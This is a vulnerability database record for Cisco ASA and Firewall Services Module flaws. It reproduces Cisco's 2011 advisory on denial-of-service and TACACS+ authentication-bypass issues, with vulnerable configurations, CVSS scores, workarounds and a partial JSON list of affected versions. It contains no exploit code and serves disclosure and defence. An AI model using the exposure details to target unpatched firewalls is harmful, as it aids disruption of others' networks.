Find a vulnerability
Search criteria
25 vulnerabilities by ingres
VAR-201110-0452
Vulnerability from variot - Updated: 2025-04-11 21:06Cisco Adaptive Security Appliances (ASA) 5500 series devices, and the ASA Services module in Cisco Catalyst 6500 series devices, with software 7.0 before 7.0(8.13), 7.1 and 7.2 before 7.2(5.4), 8.0 before 8.0(5.25), 8.1 before 8.1(2.50), 8.2 before 8.2(5.6), 8.3 before 8.3(2.23), 8.4 before 8.4(2.7), and 8.5 before 8.5(1.1) and Cisco Firewall Services Module (aka FWSM) 3.1 before 3.1(21), 3.2 before 3.2(22), 4.0 before 4.0(16), and 4.1 before 4.1(7) allow remote attackers to cause a denial of service (device reload) via malformed ILS traffic, aka Bug IDs CSCtq57697 and CSCtq57802. The problem is Bug IDs CSCtq57697 and CSCtq57802 It is a problem.Incorrect format from a third party ILS traffic Through service disruption ( Device reload ) There is a possibility of being put into a state. Multiple Cisco products are prone to multiple remote denial-of-service vulnerabilities. These issues are being tracked by Cisco Bug IDs CSCtq09972, CSCtq09978, CSCtq09986, CSCtq09989, CSCtq57802.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20111005-asa.shtml.
Administrators can enable MSN IM inspection and specify actions when a message violates a parameter, create an IM inspection policy map. You can then apply the inspection policy map when you enable IM inspection, as shown in the following example:
policy-map type inspect im MY-MSN-INSPECT
parameters
match protocol msn-im
log
!
policy-map global_policy
class inspection_default
inspect im MY-MSN-INSPECT
TACACS+ Authentication Bypass Vulnerability +------------------------------------------
An authentication bypass vulnerability affects the TACACS+ implementation of Cisco ASA 5500 Series Adaptive Security Appliances. You identify AAA server groups by name.
class-map inspection_default
match default-inspection-traffic
!
policy-map global_policy
class inspection_default
...
inspect sunrpc
...
class-map inspection_default
match default-inspection-traffic
!
policy-map global_policy
class inspection_default
...
inspect ils
... These vulnerabilities can be triggered by using UDP
packets, not TCP.
Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Firewall Services Module
Advisory ID: cisco-sa-20111005-fwsm
Revision 1.0
For Public Release 2011 October 05 1600 UTC (GMT)
+-------------------------------------------------------------------
Summary
The Cisco Firewall Services Module (FWSM) for the Cisco Catalyst 6500 Series switches and Cisco 7600 Series routers is affected by the following vulnerabilities:
- Syslog Message Memory Corruption Denial of Service Vulnerability
- Authentication Proxy Denial of Service Vulnerability
- TACACS+ Authentication Bypass Vulnerability
- Sun Remote Procedure Call (SunRPC) Inspection Denial of Service Vulnerabilities
- Internet Locator Server (ILS) Inspection Denial of Service Vulnerability
These vulnerabilities are not interdependent; a release that is affected by one vulnerability is not necessarily affected by the others.
Cisco has released free software updates that address these vulnerabilities. Workarounds are available for some of the vulnerabilities disclosed in this advisory. Affected versions of Cisco FWSM Software vary depending on the specific vulnerability. Refer to the "Software Version and Fixes" section for specific information on vulnerable versions.
Syslog Message Memory Corruption Denial of Service Vulnerability +---------------------------------------------------------------
Devices running vulnerable versions of Cisco FWSM Software are affected by this vulnerability if the following conditions are satisfied:
- The device has interfaces with IPv6 addresses
- System logging is enabled (command logging enable)
- The device is configured in any way to generate system log message 302015 (refer to the following examples)
System log message 302015 has a default severity level of 6 (informational) so, assuming that the system administrator has not changed this default severity level, the vulnerability can be triggered if the device is logging to any destination at level 6 or level 7 (debug). As an example, the following configuration is vulnerable:
logging enable
!
logging console informational
logging buffered informational
[...]
Using a custom message list (via the logging list command) that includes system log message 302015, either by severity or by explicitly including the message ID, is also a vulnerable configuration. For example, the following configuration is also vulnerable:
logging enable
!
logging list MYLIST level informational
<and/or>
logging list MYLIST message 302015
!
logging trap MYLIST
Note: The default severity level of system log messages can be changed. If the default severity level of system log message 302015 is changed, and the device is configured to log to any destination at the new severity level, then the device is still vulnerable.
Authentication Proxy Denial of Service Vulnerability +---------------------------------------------------
Devices running vulnerable versions of Cisco FWSM Software are affected by this vulnerability if they are configured to use Authentication, Authorization, and Accounting (AAA) for network access, also known as cut-through or authentication proxy. The network access authentication feature is enabled if the aaa authentication match or aaa authentication include commands are present in the configuration of an affected device.
TACACS+ Authentication Bypass Vulnerability +------------------------------------------
Devices running vulnerable versions of Cisco FWSM Software are affected by this vulnerability if they are configured to use the Terminal Access Controller Access-Control System Plus (TACACS+) protocol for AAA. A device is configured for TACACS+ if an AAA server group is defined in a manner similar to the following:
aaa-server my-tacacs-server protocol tacacs+
aaa-server my-tacacs-server (inside) host 192.168.1.1
[...]
Note: In the preceding example, "my-tacacs-server" is the name of the AAA server group.
SunRPC Inspection Denial of Service Vulnerabilities +--------------------------------------------------
Devices running vulnerable versions of Cisco FWSM Software are affected by these vulnerabilities if SunRPC inspection is enabled. SunRPC inspection is enabled by default.
To determine whether SunRPC inspection is enabled, issue the show service-policy | include sunrpc command and confirm that the command returns output. Example output follows:
FWSM# show service-policy | include sunrpc
Inspect: sunrpc, packet 324, drop 5, reset-drop 0
Alternatively, a device with SunRPC inspection enabled has a configuration similar to the following (the inspect sunrpc command is the command that actually enables SunRPC inspection, although the other commands are necessary for the Cisco FWSM to actually inspect traffic):
class-map inspection_default
match default-inspection-traffic
!
policy-map global_policy
class inspection_default
...
inspect sunrpc
!
service-policy global_policy global
Note: The service policy could also be applied to a specific interface. (Global application is shown in the previous example.)
ILS Inspection Denial of Service Vulnerability +---------------------------------------------
Devices running vulnerable versions of Cisco FWSM Software are affected by these vulnerabilities if inspection of the ILS protocol is enabled. ILS inspection is not enabled by default.
Refer to "SunRPC Inspection Denial of Service Vulnerabilities" for information on how to determine if ILS inspection is enabled. Use the configuration keyword "ils" instead of "sunrpc".
The following example shows a system with a Cisco FWSM (WS-SVC-FWM-1) installed in slot 2:
switch>show module
Mod Ports Card Type Model Serial No.
--- ----- -------------------------------------- ------------------ -----------
1 16 SFM-capable 16 port 1000mb GBIC WS-X6516-GBIC SAL06334NS9
2 6 Firewall Module WS-SVC-FWM-1 SAD10360485
3 8 Intrusion Detection System WS-SVC-IDSM-2 SAD0932089Z
4 4 SLB Application Processor Complex WS-X6066-SLB-APC SAD093004BD
5 2 Supervisor Engine 720 (Active) WS-SUP720-3B SAL0934888E
Mod MAC addresses Hw Fw Sw Status
--- ---------------------------------- ------ ------------ ------------ -------
1 0009.11e3.ade8 to 0009.11e3.adf7 5.1 6.3(1) 8.7(0.22)BUB Ok
2 0018.ba41.5092 to 0018.ba41.5099 4.0 7.2(1) 4.0(16) Ok
3 0014.a90c.9956 to 0014.a90c.995d 5.0 7.2(1) 7.0(4)E4 Ok
4 0014.a90c.66e6 to 0014.a90c.66ed 1.7 Unknown Unknown PwrDown
5 0013.c42e.7fe0 to 0013.c42e.7fe3 4.4 8.1(3) 12.2(33)SXH8 Ok
[...]
After locating the correct slot, issue the show module command to identify the software version that is running, as shown in the following example:
switch>show module 2
Mod Ports Card Type Model Serial No.
--- ----- -------------------------------------- ------------------ -----------
2 6 Firewall Module WS-SVC-FWM-1 SAD10360485
Mod MAC addresses Hw Fw Sw Status
--- ---------------------------------- ------ ------------ ------------ -------
2 0018.ba41.5092 to 0018.ba41.5099 4.0 7.2(1) 4.0(16) Ok
[...]
The preceding example shows that the Cisco FWSM is running software version 4.0(16) as indicated by the Sw column.
Note: Recent versions of Cisco IOS Software will show the software version of each module in the output from the show module command; therefore, executing the show module command is not necessary.
If a Virtual Switching System (VSS) is used to allow two physical Cisco Catalyst 6500 Series switches to operate as a single logical virtual switch, the show module switch all command can display the software version of all FWSMs that belong to switch 1 and switch 2. The output from this command will be similar to the output from show module but will include module information for the modules in each switch in the VSS. The FWSM offers firewall services with stateful packet filtering and deep packet inspection.
Syslog Message Memory Corruption Denial of Service Vulnerability +---------------------------------------------------------------
The Cisco FWSM has a system log (syslog) feature that provides information for monitoring normal operation and troubleshooting network or device issues. System log messages are assigned different severities (debugging, informational, error, critical, etc.) and can be sent to different logging destinations.
A denial of service vulnerability exists in the implementation of one specific system log message (message ID 302015, "Built outbound UDP connection session-id for src-intf:IP/Port to dst-intf:IP/Port ARP-Incomplete") that can cause memory corruption and lead to a lock up or crash of the Cisco FWSM in the event that that system log message needs to be generated for IPv6 traffic that has flowed through the device. The Cisco FWSM may not recover on its own and a manual reboot may be necessary to recover.
System log message 302015 has a default severity level of 6 (informational). Changing the default severity level of this system message will not prevent the issue from occurring if the system is logging to any destinations at the new severity level. The Cisco FWSM must have interfaces with IPv6 addresses otherwise the problem does not occur.
Authentication Proxy Denial of Service Vulnerability +---------------------------------------------------
The Cisco FWSM authentication proxy feature allows one to use AAA to control access to network resources. Specifically, the Cisco FWSM cut-through proxy challenges a user initially at the application layer and then authenticates against AAA servers. After the Cisco FWSM authenticates the user, it shifts the session flow, and all traffic flows directly between the user's computer and the network resource being accessed.
A denial of service vulnerability exists in some versions of Cisco FWSM Software that affects devices configured to use authentication to grant users access to the network, also known as cut-through or authentication proxy. Vulnerable configurations are those that contain the aaa authentication match or aaa authentication include commands. The vulnerability may be triggered when there is a high number of network access authentication requests.
TACACS+ Authentication Bypass Vulnerability +------------------------------------------
AAA enables the Cisco FWSM to determine who the user is (authentication), what the user can do (authorization), and what the user did (accounting). The Cisco FWSM supports TACACS+ authentication for VPN users, firewall sessions, and administrative access to the device.
An authentication bypass vulnerability exists in the TACACS+ implementation in the Cisco FWSM. Successful exploitation could allow a remote attacker to bypass TACACS+ authentication of VPN users (the Cisco FWSM only allows VPN sessions for management), firewall sessions, or administrative access to the device.
SunRPC Inspection Denial of Service Vulnerabilities +--------------------------------------------------
The SunRPC inspection engine enables or disables application inspection for the SunRPC protocol. SunRPC is used by Network File System (NFS) and Network Information Service (NIS). SunRPC services can run on any port. When a client attempts to access a SunRPC service on a server, it must learn the port on which the service is running. The client does this by querying the port mapper process, usually rpcbind, on the well-known port of 111.
The Cisco FWSM is affected by four vulnerabilities that may cause the device to reload during the processing of different crafted SunRPC messages when SunRPC inspection is enabled. These vulnerabilities are triggered only by transit traffic; traffic that is destined to the device does not trigger these vulnerabilities.
ILS Inspection Denial of Service Vulnerability +---------------------------------------------
The ILS inspection engine provides Network Address Translation (NAT) support for Microsoft NetMeeting, SiteServer, and Active Directory products that use Lightweight Directory Access Protocol (LDAP) to exchange directory information with an ILS server. This vulnerability is triggered by transit traffic only; traffic that is destined to the device does not trigger this vulnerability.
Vulnerability Scoring Details +----------------------------
Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
- CSCti83875 -- Syslog message 302015 may lead to memory corruption and CP lockup
CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete
CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed
- CSCtn15697 -- FWSM crash in thread name uauth
CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete
CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed
- CSCto74274 -- Crafted TACACS+ reply considered as successful auth by FWSM
CVSS Base Score - 7.9 Access Vector - Adjacent Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete
CVSS Temporal Score - 6.5 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed
- SunRPC Inspection Denial of Service Vulnerabilities
CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete
CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed
- CSCtq57802 -- ILS inspection crash on malformed ILS traffic
CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete
CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed
Impact
Successful exploitation of any of the denial of service vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained denial of service condition.
Successful exploitation of the TACACS+ authentication bypass vulnerability could allow an attacker to bypass authentication of VPN, firewall, and/or administrative sessions.
Software Versions and Fixes
When considering software upgrades, also consult: http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.
Each row of the following Cisco FWSM Software table describes a major Cisco FWSM Software train and the earliest possible release in that train that contains the fix (the "First Fixed Release") and the anticipated date of availability (if not currently available) in the First Fixed Release column. A device that is running a release that is earlier than the release in a specific column (earlier than the First Fixed Release) is known to be vulnerable. A vulnerable release should be upgraded to the indicated release at a minimum, or a later version (later than or equal to the First Fixed Release label). These vulnerabilities and their respective workarounds are independent of each other.
Syslog Message Memory Corruption Denial of Service Vulnerability +---------------------------------------------------------------
Completely disabling syslog 302015 with the command no logging message 302015 is an effective workaround for this vulnerability.
Authentication Proxy Denial of Service Vulnerability +---------------------------------------------------
There are no workarounds available for this vulnerability.
TACACS+ Authentication Bypass Vulnerability +------------------------------------------
There are no workarounds available for this vulnerability other than using a different authentication protocol such as RADIUS and LDAP.
SunRPC Inspection Denial of Service Vulnerabilities +--------------------------------------------------
Administrators can mitigate these vulnerabilities by disabling SunRPC inspection if it is not required. Administrators can disable SunRPC inspection by issuing the no inspect sunrpc command in class configuration sub-mode in the policy map configuration. Disabling SunRPC inspection may cause SunRPC traffic to stop transiting the security appliance.
ILS Inspection Denial of Service Vulnerability +---------------------------------------------
Administrators can mitigate this vulnerability by disabling ILS inspection if it is not required. Administrators can disable ILS inspection by issuing the no inspect ils command in class configuration sub-mode in the policy map configuration. Disabling ILS inspection may cause ILS traffic to stop through the security appliance.
Obtaining Fixed Software
Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.
Customers with Service Contracts +-------------------------------
Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations +------------------------------------------------
Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.
Customers without Service Contracts +----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.
- +1 800 553 2447 (toll free from within North America)
- +1 408 526 7209 (toll call from anywhere in the world)
- e-mail: tac@cisco.com
Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory.
The Syslog Message Memory Corruption Denial of Service Vulnerability, Authentication Proxy Denial of Service Vulnerability, and TACACS+ Authentication Bypass Vulnerability were discovered during the troubleshooting of customer service requests.
The SunRPC Inspection Denial of Service Vulnerabilities and ILS Inspection Denial of Service Vulnerability were discovered by Cisco during internal testing.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.
Distribution
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20111005-fwsm.shtml
In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.
- cust-security-announce@cisco.com
- first-bulletins@lists.first.org
- bugtraq@securityfocus.com
- vulnwatch@vulnwatch.org
- cisco@spot.colorado.edu
- cisco-nsp@puck.nether.net
- full-disclosure@lists.grok.org.uk
- comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.
Revision History
+---------------------------------------+ | Revision | | Initial | | 1.0 | 2011-October-05 | public | | | | release. | +---------------------------------------+
Cisco Security Procedures
Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt
+-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS)
iFcDBQFOjHRIQXnnBKKRMNARCAUrAP9BnUYauwq7OzqUJRuoVjBLn6T2Qh3S/LRn e0k/AYOr8AD/T7EQ/K8N+bAPmYBoJxsERyDGg80x/pxfRWFBd1s2+nE= =hr9R -----END PGP SIGNATURE-----
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201110-0452",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "4.1\\(6\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "4.0\\(1\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "8.2.2"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "4.0\\(15\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "3.2\\(21\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "4.1\\(5\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "4.0\\(5\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "4.0\\(2\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "4.0\\(3\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "4.0\\(8\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0\\(4\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(2\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0\\(12\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0\\(13\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(13\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(15\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0.5"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.1"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.2\\(1\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(12\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0.1"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(18\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1\\(4\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.3\\(1\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(1\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.2\\(2\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(20\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(17\\)"
},
{
"model": "5500 series adaptive security appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.2\\(4\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(2\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.2\\(5\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(8\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(1\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(19\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1\\(3\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.0.4"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(7\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(2.17\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2.1"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(9\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.2\\(4.4\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1\\(1\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(4\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(9\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0\\(14\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0\\(7\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.2\\(3.9\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(8\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.0.5"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(11\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(1.22\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(14\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2.3"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(11\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2\\(10\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.2\\(4.1\\)"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(4\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(2.14\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0\\(1\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.0.3"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0.6"
},
{
"model": "firewall services module software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1\\(5\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0\\(5.2\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(3\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(2.15\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(2.8\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.0\\(4\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0.8"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.5"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2\\(2.5\\)"
},
{
"model": "adaptive security appliance software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
